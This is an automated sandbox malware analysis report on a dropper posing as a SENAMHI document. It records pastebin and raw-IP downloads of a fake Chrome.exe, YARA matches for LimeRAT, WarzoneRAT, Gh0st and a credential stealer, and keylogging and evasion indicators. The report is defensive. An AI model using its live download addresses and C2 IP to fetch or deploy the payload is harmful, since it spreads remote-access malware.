DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownDNS traffic detected: queries for: pastebin.com
                      Source: global trafficHTTP traffic detected: GET /raw/03PEm7js HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Chrome.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.111.242.20Connection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.111.242.20

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWindow created: window name: CLIPBRDWNDCLASS

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Operating System Destruction

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: 01 00 00 00

                      System Summary

                      barindex
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPEMatched rule: LimeRAT payload Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPEDMatched rule: LimeRAT payload Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPEDMatched rule: LimeRAT payload Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPEDMatched rule: LimeRAT payload Author: ditekSHen
                      Source: initial sampleStatic PE information: Filename: DocumentoSENAMHI20222103.exe
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BDFA9C1_2_00BDFA9C
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_029341F815_2_029341F8
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293613015_2_02936130
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293C95815_2_0293C958
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_02934E1015_2_02934E10
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293AD0015_2_0293AD00
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293454015_2_02934540
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeCode function: 15_2_0293ACF515_2_0293ACF5
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 18_2_02B941F818_2_02B941F8
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 18_2_02B9613018_2_02B96130
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 18_2_02B94E1018_2_02B94E10
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 18_2_02B9454018_2_02B94540
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 19_2_013C41F819_2_013C41F8
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 19_2_013C4E1019_2_013C4E10
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 19_2_013C454019_2_013C4540
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edgegdi.dll
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeSection loaded: edgegdi.dll
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeSection loaded: sbiedll.dll
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeSection loaded: edgegdi.dll
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeSection loaded: sbiedll.dll
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeSection loaded: edgegdi.dll
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe 21B86512DE83574C3AD44210D025E93FB28D205CFBD18825DA0A64A52063B627
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IconLib.dll 087A0C5F789E964A2FBCB781015D3FC9D1757358BC63BB4E0B863B4DFFDB6E4F
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 18.2.chrome.exe.53f0000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                      Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                      Source: 18.2.chrome.exe.53d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
